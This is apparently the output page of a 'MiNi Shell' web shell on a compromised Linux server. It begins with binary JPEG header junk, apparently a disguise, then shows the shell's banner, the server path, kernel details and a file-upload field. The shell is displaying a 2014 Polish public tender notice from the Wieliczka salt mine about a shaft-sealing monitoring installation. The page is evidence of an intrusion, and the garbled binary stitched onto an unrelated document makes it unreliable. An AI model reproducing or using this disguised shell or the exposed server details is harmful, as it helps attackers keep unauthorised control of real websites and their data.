JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140213/29049-N-2014.html

<p class="kh_header"><b>Wieliczka: Wykonanie instalacji monitorującej przebieg uszczelniania szybu górniczego wraz z jej zabudową w szybie Kościuszko do poziomu I.</b><br>
<b>Numer ogłoszenia: 29049 - 2014; data zamieszczenia: 13.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie instalacji monitorującej przebieg uszczelniania szybu górniczego wraz z jej zabudową w szybie Kościuszko do poziomu I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia
1)Przedmiotem zamówienia jest wykonanie instalacji monitorującej przebieg uszczelniania szybu górniczego wraz z jej zabudową w szybie górniczym Kościuszko od zrębu szybu do poziomu I, zwanej dalej Instalacją Monitorującą.
2)Instalacja Monitorująca zostanie wykonana w ramach przedsięwzięcia polegającego na opracowaniu technologii uszczelniania szybów górniczych według metody iniekcji z wykorzystaniem materiałów mineralnych realizowanego w ramach projektu: Opracowanie technologii uszczelniania szybów górniczych przez Kopalnię Soli Wieliczka, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2014 działanie 1.4 Wsparcie projektów celowych.
2.Wymagania dotyczące Instalacji Monitorującej
2.1W skład Instalacji Monitorującej winny wchodzić następujące elementy: 
1)urządzenia pozwalające prowadzić wizyjny monitoring obudowy i uzbrojenia uszczelnianego szybu,
2)urządzenia pozwalające prowadzić monitoring stężeń pH oraz deformacji uszczelnianego szybu i obiektów w rejonie oddziaływania iniekcji.
2.2.Urządzenia pozwalające prowadzić wizyjny monitoring obudowy i uzbrojenia uszczelnianego szybu winny charakteryzować się następującymi parametrami:
1)kamera cyfrowa lub kamery cyfrowe kolorowe zainstalowane w urządzeniu muszą posiadać rozdzielczość zapewniającą jakość obrazu HD i kąt obserwacji wynoszący w poziomie 360° oraz stabilizację obrazu i źródło światła dające możliwość rejestracji obrazu w całkowicie zaciemnionym wyrobisku szybowym (np.: w skład urządzenia winny wchodzić 4 kamery HD z oświetleniem zapewniające rejestrację cyfrową procesu uszczelniania wewnątrz rury szybowej lub inne rozwiązanie równoważne),
2)ciężar elementów urządzenia opuszczanych do szybu nie powinien przekraczać
200 kg,
3)urządzenie powinno być wyposażone w okablowanie i napęd (wyciąg) pozwalający na jego opuszczanie szybem górniczym do głębokości od 0 do 60 m,
4)urządzenie powinno umożliwiać bieżący podgląd wyświetlania i jego zapis oraz stabilność kierunku obserwacji.
2.3.Urządzenia pozwalające prowadzić monitoring stężeń pH oraz deformacji uszczelnianego szybu i obiektów 
w rejonie oddziaływania iniekcji winny charakteryzować się następującymi parametrami:
1)monitoring stężeń pH - urządzenie powinno być wyposażone w ok. 8 szt. pH-metrów. Czujniki mierzące pH wraz z okablowaniem powinny być podłączone do komputera umożliwiając odczyt i rejestrację wyników pomiaru. Czujniki powinny mierzyć zakres stężeń w skali pH od 6 - 14. Czujniki te powinny mierzyć pH wody wyciekającej do rynienek istniejących na obudowie szybu na dźwigarach zbrojenia szybowego - miejsce montażu pH metrów uzależnione jest od lokalizacji rynienek ( w przedziale od 0 m do 60m).
2)Monitoring deformacji:
a)urządzenie powinno być wyposażone w 5 zestawów czujników z urządzeniami rejestrującymi zamontowanymi na 5 poziomach (horyzontach) pomiarowych (0, -12, -24, -36, -48) połączonych z komputerem umożliwiającym odczyt i rejestrację wyników pomiaru. Na każdym horyzoncie pomiarowym powinny być zainstalowane 2 czujniki zmian długości na najdłuższych wymiarach -po jednym pochyłomierzu dwuosiowym. 5 horyzontów poziomych powinno być połączone 4 cięgnami pionowymi;
b)urządzenie w kanale wentylacyjnym powinno składać się z 2 cięgien (1 szt. poziom, 1 szt. pion);
c)urządzenie powinno posiadać 2 pochyłomierze na trzonie wieży szybowej oraz 1 cięgno mierzące zmianę między stopami zastrzałów wieży szybowej.
2.4.Instalacja Monitorująca musi umożliwiać bieżący przegląd i interpretację wszystkich mierzonych parametrów. Instalacja Monitorująca powinna, zbierać i przesyłać w czasie rzeczywistym informacje w formie cyfrowej do komputera zlokalizowanego na powierzchni i wyświetlać go na ekranie, oraz dodatkowo dane te powinny być archiwizowane. Komputer wraz z oprogramowaniem, zainstalowany 
na powierzchni, w pomieszczeniu przyszybowym winien wchodzić w skład Instalacji Monitorującej (winien być dostarczony). Komputer powinien posiadać system bezpiecznej archiwizacji danych (np. modem GSM wraz z oprogramowaniem umożliwiającym gromadzenie danych w chmurze - cloud computing - lub inne rozwiązanie równoważne).
3.Zasady wykonania przedmiotu zamówienia
3.1.Przedmiot zamówienia zostanie zrealizowany w następujących etapach:
1)etap I - opracowanie projektu technicznego,
2)etap II - zabudowanie Instalacji Monitorującej w szybie Kościuszko,
3)etap III - bieżący nadzór nad badaniami przemysłowymi,
4) etap IV - prace rozwojowe.
3.2.Realizacja etap IV zostanie przeprowadzona na odrębne zlecenie Zamawiającego. Zlecenie wykonywania etapu IV zależeć będą od potrzeb Zamawiającego. Oznacza to, że Zamawiający może zrezygnować z realizacji etapu IV (prawo opcji). Zlecenie wykonania etapu IV nastąpi pisemnie, co najmniej na 2 tygodnie przed określonym przez Zamawiającego terminem rozpoczęcia wykonywania prac w ramach tego etapu. Pisemne zlecenie zostanie jednocześnie przekazane faksem na numer wskazany przez Wykonawcę. Równocześnie Zamawiający poinformuje Wykonawcę o zleceniu telefonicznie. 
3.3.W ramach realizacji etapu I Wykonawca jest zobowiązany sporządzić projekt techniczny wraz z technologią wykonania robót Instalacji Monitorującej, który winien zawierać w szczególności opis techniczny proponowanego rozwiązania wraz z niezbędnymi rysunkami technicznymi.
3.4.W ramach realizacji etapu II Wykonawca jest zobowiązany:
1)wykonać Instalację Monitorującą,
2)zainstalować Instalację Monitorującą w szybie Kościuszko,
3)przeprowadzić kalibrację i testowanie Instalacji Monitorującej,
4)przeprowadzić skaning laserowy szybu Kościuszko przed rozpoczęciem prac iniekcyjnych, które będą odrębnie realizowane przez Zamawiającego,
5)przeprowadzić szkolenia pracowników Zamawiającego w zakresie prawidłowego wykorzystania Instalacji Monitorującej i prowadzenia pomiarów z jej użyciem.
3.5.W ramach realizacji etapu III Wykonawca jest zobowiązany pełnić nadzór nad badaniami przemysłowymi, rozumianymi jako nadzór nad funkcjonowaniem Instalacji Monitorującej w trakcie prowadzenia prac iniekcyjnych przez Zamawiającego. Wykonawca jest zobowiązany w szczególności:
1)czuwać w toku realizacji prac iniekcyjnych, które będą odrębnie realizowane przez Zamawiającego, nad zgodnością rozwiązań technicznych, materiałowych i użytkowych,
2)do udziału w naradach technicznych odbywających się u Zamawiającego,
3)przedstawiania koncepcji i sposobu optymalizacji Instalacji Monitorującej, a w szczególności przedstawienia możliwości rozwoju Instalacji Monitorującej w ramach prac realizowanych w ramach etapu III.
3.6.W ramach realizacji etapu IV Wykonawca jest zobowiązany dostosować Instalację Monitorującą do aktualnych warunków pracy, w tym w szczególności:
1)dostosowywać oprogramowanie oraz liczbę i lokalizację czujników, jeżeli okaże się to konieczne,
2)przeprowadzać kalibrację Instalacji Monitorującej,
3)przeprowadzać inne prace prowadzące do optymalizacji pracy Instalacji Monitorującej,
4)przeprowadzić skaning laserowy szybu Kościuszko w trakcie prowadzenia prac iniekcyjnych,
5)pełnić nadzór nad funkcjonowaniem Instalacji Monitorującej w trakcie prowadzenia prac iniekcyjnych przez Zamawiającego, w tym w szczególności:
a)brać udział w naradach technicznych odbywających się u Zamawiającego,
b)przedstawiać koncepcję i sposób optymalizacji prowadzonych obserwacji przy użyciu Instalacji Monitorującej, a w szczególności przedstawić możliwości rozwoju Instalacji Monitorującej w ramach prac realizowanych w ramach etapu IV,
6)przeprowadzać skaning laserowy szybu Kościuszko po zakończeniu prac iniekcyjnych,
7)zmodyfikować instalację na podstawie doświadczeń pozyskanych w trakcie prac rozwojowych.
Szczegółowe informacje dotyczące przedmiotu zamówienia i zasad jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 7 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 1 000,00 zł  należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie należytego wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług mających za przedmiot wykonanie badań tensometrycznych lub telemetrycznych 
na rzecz górnictwa wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)udokumentowanie, że prace montażowe i pomiary w szybie będą wykonywane pod nadzorem osoby posiadającej zatwierdzenie do nadzorowania prac w podziemnych zakładach górniczych stwierdzonych zgodnie z wymogami Prawo Geologiczne i Górnicze w specjalności energomechanicznej,
2)udokumentowanie, że osoba, która będzie nadzorować opracowany system posiada uprawnienia z zakresu wpływów eksploatacji na powierzchnię i górotwór lub geodezji górniczej i teledetekcji,
c)	udokumentowanie, że w skład zespołu będzie wchodzić co najmniej jeden samodzielny pracownik naukowy z zakresu wpływów eksploatacji na powierzchnię i górotwór lub geodezji górniczej i teledetekcji,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 100 000,00 złotych (polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w ust. 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
2)działania siły wyższej,
3)zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.Zaistnienie przyczyn, wymienionych w ust. 2, nie powoduje powstania u żadnej ze stron  umowy, roszczenia o zmianę umowy.
4.W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w ust. 2, każdej ze stron  umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę  umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)uzasadnienie dokonania zmiany umowy,
3)projekt zmiany umowy.
5.Wystąpienie, o którym mowa w ust. 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6.Zmiana umowy  wymaga zachowania formy pisemnej pod rygorem nieważności.
7.Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8.Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój nr A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2014 godzina 12:00, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 3
2-020 Wieliczka Sekretariat Zarządu - budynek A parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com